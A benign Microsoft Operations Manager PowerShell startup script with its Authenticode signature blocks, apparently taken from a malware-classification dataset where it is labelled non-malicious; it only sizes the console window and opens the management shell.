aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAQEbHQG/1crJ3IAAAAABAQwDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIPT6ZSWT7Kij0GhyHUw20ogd # oGtWDlrvt6hIRj6gL4y4MEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAmxAzcqfbZU0tK+Vf6roASiNjg5t5DL2O5cJ/mewlCObI1reLMUrcUCTW # h1cud2u52nzjmYA1Za7AtFN1dNQo39XFHOuaTC5kioNxqua+nmMEpvZhNg9jayJY # M78qn+uW+9iwzCBiQu1JFTIf6lFtK8XP1gKzJBCodjmrmolx/iAQjHN1rL3rBeIu # LpqOi7hSphB1uSM/DiTEj8/Le9rZdB8LoVZnw1nPjJ5vW9Yd2JwyoWGrYppKtLJc # tjO2XvSxAG0MqafRfAeRPr+pTBjmMEaCoscSkO2wL7UB6Swb0FdPwYQJkaB/mC4u # HyZGpfI/Ph6Nt7P44B+N+JCZFQOnYqGCF5QwgheQBgorBgEEAYI3AwMBMYIXgDCC # F3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsq # hkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCAf9EPI/BpSvc+3liKmxM88G/DVV6X5XCuFJWM2CUzyBgIGZxqGn6wt # GBMyMDI0MTAyODExNDA0MS4xMThaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046ODkwMC0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Wg # ghHqMIIHIDCCBQigAwIBAgITMwAAAe3hX8vV96VdcwABAAAB7TANBgkqhkiG9w0B # AQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD # VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1 # NDFaFw0yNTAzMDUxODQ1NDFaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25z # MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046ODkwMC0wNUUwLUQ5NDcxJTAjBgNV # BAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQCoMMJskrrqapycLxPC1H7zD7g88NpbEaQ6SjcTIRbz # CVyYQNsz8TaL1pqFTEAPL1X7ojL4/EaEW+UjNqZs/ayMyW4YIpFPZP2x4FBMVCdd # seF2i+aMMjDHi0LcTQZxM2s3mFMrCZAWSfLYXYDIimFBz8j0oLWGy3VgLmBTKM4x # Lqv7DZUz8B2SoAmbEtp62ngSl0hOoN73SFwE+Y24SvGQMWhykpG+vXDwcpWvwDe+ # TgnrLR7ATRFXN5JS26dm2yy6SYFMRYnME3dMHCQ/UQIQQNC8nLmIvdKkAoWEMXtJ # sGEo3QrM2S2SBv4PpHRzRukzTtP+UAceGxM9JyrwUQP5OCEmW6YchEyRDSwP4hU9 # f7B0Ayh14Pw9vJo7jewNjeMPIkmneyLSi0ruv2ox/xRGtcJ9yBNC5BaRktjz7stP # aojR+PDA2fuBtCo8xKlkt53mUb7AY+CZHHqhLm76pdMF6BHv2TvwlVBeQRN22Xja # VVRwCgjgJnNewt7PejcrpUn0qHLgLq+1BN1DzYukWkTr7wT0zl0iXr+NtqUkWSOn # WRfe8N21tB6uv3VkW8nFdChtbbZZz24peLtJEZuNrN8Xf9PTPMzZXDJBI1EciR/9 # 1QcGoZFmVbFVb2rUIAs01+ZkewvbhmGVDefX9oZG4/K4gGUsTvTW+r1JZMxUT2Mw # qQIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFM4b8Oz33hAqBEfKlAZf0NKh4CIZMB8G # A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCG # Tmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUy # MFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4w # XAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2Vy # dHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwG # A1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQD # AgeAMA0GCSqGSIb3DQEBCwUAA4ICAQCd1gK2Rd+eGL0eHi+iE6/qDY8sbbsO4ema # ncp6KPN+xq5ZAatiBR4jmRRhm+9Vik0Fo0DLWi/N28bFI7dXYw09p3vCipbjy4Eo # ifm0Nud7/4U30i9+7RvW7XOQ3rx37+U7vq9lk6yYpGCNp0jlJ188/CuRPgqJnfq5 # EdeafH2AoG46hKWTeB7DuXasGt6spJOenGedSre34MWZqeTIQ0raOItZnFuGDy4+ # xoD1qRz2QW+u2gCHaG8AQjhYUM4uTi9t6kttj6c7Xamr2zrWuceDhz7sKLttLTJ7 # ws5YrA2I8cTlbMAf2KW0GVjKbYGd+LZGduEK7/7fs4GUkMqc51FsNdG1n+zgc7zH # u2oGGeCBg4s8ZR0ZFyx7jsgm9sSFCKQ5CsbAvlr/60Ndk5TeMR8Js2kNUicu2CqZ # 03833TsvTgk7iD1KLgfS16HEvjN6m4VKJKgjJ7OJJzabtS4JQgUnJrIZfyosk4D1 # 8rZni9pUwN03WgTmd10WTwiZOu4g8Un6iKcPMY/iFqTu4ntkzFUxBBpbFG6k1CIN # ZmoirEWmCtG3lyZ2IddmjtIefTkIvGWb4Jxzz7l2m/E2kGOixDJHsahZVmwsoNvh # y5ku/inU++dXHzw+hlvqTSFT89rIFVhcmsWPDJPNRSSpMhoJ33V2Za/lkKcbkUM0 # SbQgS9qsdzCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZI # hvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # MjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy # MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC # AQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25Phdg # M/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPF # dvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6 # GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBp # Dco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50Zu # yjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3E # XzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0 # lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q # GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ # +QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PA # PBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkw # EgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxG # NSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARV # MFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWlj # cm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAK # BggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC # AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX # zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v # cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI # KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG # 9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0x # M7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmC # VgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449 # xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wM # nosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDS # PeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2d # Y3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxn # GSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs # QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL # jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL # 6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNN # MIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp # bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw # b3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEn # MCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjg5MDAtMDVFMC1EOTQ3MSUwIwYDVQQD # ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQDu # HayKTCaYsYxJh+oWTx6uVPFw+aCBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w # IFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6smiIDAiGA8yMDI0MTAyODA1Mzk0 # NFoYDzIwMjQxMDI5MDUzOTQ0WjB0MDoGCisGAQQBhFkKBAExLDAqMAoCBQDqyaIg # AgEAMAcCAQACAikmMAcCAQACAhNdMAoCBQDqyvOgAgEAMDYGCisGAQQBhFkKBAIx # KDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJKoZI # hvcNAQELBQADggEBAFmckdUeifZt8BprZ3zxv8eo/W1geDvTCg+AfBgsP5eubV4p # W8eAaVQPjzjVseXEjtLErgpcesWIgWtwjTBdGPVhCatB3NRfg/awbJSa7tZm4sDy # cdvhoeYBZ3BqswvkYUxhhKUbAnZYYibg+H6YnGrog3UF4G0KdCndtoLOLZfqFPkL # DzGpuEBwwuEfDjxgLz2GfRP0jeSHOA0d2f5CnwY3Tij2x/Thsl/+cvbZ4a/Eqb8p # D8brFUdxFlOHbW3UMTLvz863JdgDarmdvyz/z5x1qIsWwKHlydHqbGF6reb09z9d # EdUNok4tjGHZW5O/uOd7Y340oWdSzkS012Nnz8UxggQNMIIECQIBATCBkzB8MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNy # b3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAe3hX8vV96VdcwABAAAB7TAN # BglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEEMC8G # CSqGSIb3DQEJBDEiBCB+mvwTUmKGo5bv/Gr+ZJLJsZK6J5df0+nORJ4dkRScwDCB # +gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EII0uDWg0CFseKxK3A16l1wrIwrsS # DrXZ6xSf0F4xbMo5MIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldh # c2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD # b3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIw # MTACEzMAAAHt4V/L1felXXMAAQAAAe0wIgQgJHwmHNb0a877pzs9GGBhooAWbWEx # ml1o498sDW/Bg5wwDQYJKoZIhvcNAQELBQAEggIAM2Og7mRDl44YRt8a3wu9h1Rz # VL1YfLnLjnnAN/rBY00tjCyk9sFna+4YkoynLoHSd5ySn/cMfZgzI2uOdS0V5xQb # xPgXZ8LwduZIYJ3HEC8e9L8ws6zyRujB3zZarIj5lFkEI3Z7AzVjuik6VAoP8kCe # vWrA8neainJkBBcA/4qU+hzJiOefI6ab4A4uxE6RRhbRn2qzkbQs2xOZqN65uEfj # dtEkXv5dH9B0bFlw5BZNwFEVI3YlLD8VmkGJrvKizrqQbJW+e84WIajMHgkAJTXK # 77eEIy9E0FRDi/hZ1TPxkImBfgWBCUTEdU3ih7PRs7L2ipJQdgSa+vY9Y1ufuPPM # /qyCVznV91Z0+SrKVePo+9R9Uv3anT+9IeJhMoPPEjQ5VL7i607kUGPhJ3vv11uy # KAgBMcwKOSKsMLDtqCYYymAHo0et/svSt6skjh/glxIr0lNGNiLAO5j/e/2hOHdW # FhZ2xJYZDJ95LmrFI7PtOCnIuXGPbx1PgwIb1/jw967h8s8Fcsra/kkK92cDm3y5 # PJYN141kyj/zrTriYe7t6SEM8+voKYGhYPK80LVIbEf5npZjK3mF5mLW+qzVJ6E3 # PWGos0RbPh+k84kQevFU9an9FGz+DMaiNT00eAWxk64noZ+XdpSL4viKbysjcxTH # 8trxIwcooSPYJMxAD6E= # SIG # End signature block
combined_dataset/train/non-malicious/sample_40_94.ps1
sample_40_94.ps1
########################################################################################## # <copyright file="Startup.ps1" company="Microsoft"> # Copyright (c) Microsoft Corporation. All rights reserved. # </copyright> # <summary>Startup.ps1 script.</summary> ########################################################################################## $defaultWindowWidth = 120 $defaultBufferHeight = 3000 $windowSize = $host.UI.RawUI.WindowSize $bufferSize = $host.UI.RawUI.BufferSize if($bufferSize) { if($bufferSize.Width -lt $defaultWindowWidth){ $bufferSize.Width = $defaultWindowWidth } if($bufferSize.Height -lt $defaultBufferHeight){ $bufferSize.Height = $defaultBufferHeight } $host.UI.RawUI.BufferSize = $bufferSize } if($windowSize) { if($windowSize.Width -lt $defaultWindowWidth){ $windowSize.Width = [Math]::Min($defaultWindowWidth, $host.UI.RawUI.MaxWindowSize.Width) } $host.UI.RawUI.WindowSize = $windowSize } Start-OperationsManagerClientShell -ManagementServerName: "" -PersistConnection: $true -Interactive: $true; cd \ # SIG # Begin signature block # MIIoAAYJKoZIhvcNAQcCoIIn8TCCJ+0CAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCD6Jf0K8K3Ko3sH # wp3sUBBGX6DHO4EeQA5Hmy9TRD0oQqCCDYUwggYDMIID66ADAgECAhMzAAADri01 # UchTj1UdAAAAAAOuMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwODU5WhcNMjQxMTE0MTkwODU5WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQD0IPymNjfDEKg+YyE6SjDvJwKW1+pieqTjAY0CnOHZ1Nj5irGjNZPMlQ4HfxXG # yAVCZcEWE4x2sZgam872R1s0+TAelOtbqFmoW4suJHAYoTHhkznNVKpscm5fZ899 # QnReZv5WtWwbD8HAFXbPPStW2JKCqPcZ54Y6wbuWV9bKtKPImqbkMcTejTgEAj82 # 6GQc6/Th66Koka8cUIvz59e/IP04DGrh9wkq2jIFvQ8EDegw1B4KyJTIs76+hmpV # M5SwBZjRs3liOQrierkNVo11WuujB3kBf2CbPoP9MlOyyezqkMIbTRj4OHeKlamd # WaSFhwHLJRIQpfc8sLwOSIBBAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQUhx/vdKmXhwc4WiWXbsf0I53h8T8w # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMTgzNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AGrJYDUS7s8o0yNprGXRXuAnRcHKxSjFmW4wclcUTYsQZkhnbMwthWM6cAYb/h2W # 5GNKtlmj/y/CThe3y/o0EH2h+jwfU/9eJ0fK1ZO/2WD0xi777qU+a7l8KjMPdwjY # 0tk9bYEGEZfYPRHy1AGPQVuZlG4i5ymJDsMrcIcqV8pxzsw/yk/O4y/nlOjHz4oV # APU0br5t9tgD8E08GSDi3I6H57Ftod9w26h0MlQiOr10Xqhr5iPLS7SlQwj8HW37 # ybqsmjQpKhmWul6xiXSNGGm36GarHy4Q1egYlxhlUnk3ZKSr3QtWIo1GGL03hT57 # xzjL25fKiZQX/q+II8nuG5M0Qmjvl6Egltr4hZ3e3FQRzRHfLoNPq3ELpxbWdH8t # Nuj0j/x9Crnfwbki8n57mJKI5JVWRWTSLmbTcDDLkTZlJLg9V1BIJwXGY3i2kR9i # 5HsADL8YlW0gMWVSlKB1eiSlK6LmFi0rVH16dde+j5T/EaQtFz6qngN7d1lvO7uk # 6rtX+MLKG4LDRsQgBTi6sIYiKntMjoYFHMPvI/OMUip5ljtLitVbkFGfagSqmbxK # 7rJMhC8wiTzHanBg1Rrbff1niBbnFbbV4UDmYumjs1FIpFCazk6AADXxoKCo5TsO # zSHqr9gHgGYQC2hMyX9MGLIpowYCURx3L7kUiGbOiMwaMIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGdEwghnNAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAOuLTVRyFOPVR0AAAAA # A64wDQYJYIZIAWUDBAIBBQCggeAwGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIFsr # 2EaxfMadgn95pumI/Q8T0k/D3Xqix9OGLbBhoVEYMHQGCisGAQQBgjcCAQwxZjBk # oEaARABTAHkAcwB0AGUAbQAgAEMAZQBuAHQAZQByACAALQAgAE8AcABlAHIAYQB0 # AGkAbwBuAHMAIABNAGEAbgBhAGcAZQByoRqAGGh0dHA6Ly93d3cubWljcm9zb2Z0 # LmNvbTANBgkqhkiG9w0BAQEFAASCAQAf76UjEttIQqY5AP6I9ImQRPA1m76pyIyt # JBPrA2hHWf8vrnQFKFAcwuyTEhI71CtqTjGrPgHqMBBW9NDD9bK9WrbgVelf+P/U # TkzjuujwULznv2j2xaZ7NMuDC84QOm93SUlgtfcayp6rV8rwnJdmy/TeG5P6ksPA # YZJJD3JhOUJDRI485JRl+czv0IrVR2ln60Ehuc5ay8AOiEHaeRMU7OTycz4WGQ72 # GI6pgsUgp7hvBjnMKVQkkek4fswcs+hE5sPaP5VqfZSKfWbnJ5FkiWvsHNuwRC4A # 5F6S725Qfq29xYZCDkzQwjesJ2G4lfE+zKQOXggRjILmP6ld3gnboYIXKTCCFyUG # CisGAQQBgjcDAwExghcVMIIXEQYJKoZIhvcNAQcCoIIXAjCCFv4CAQMxDzANBglg # hkgBZQMEAgEFADCCAVkGCyqGSIb3DQEJEAEEoIIBSASCAUQwggFAAgEBBgorBgEE # AYRZCgMBMDEwDQYJYIZIAWUDBAIBBQAEIEX4OyX160uk9j4DJDQ2Wev37wUaLOb+ # rywFQaZYNFuIAgZl1jT/oE4YEzIwMjQwMzA1MTM0NTUxLjY0M1owBIACAfSggdik # 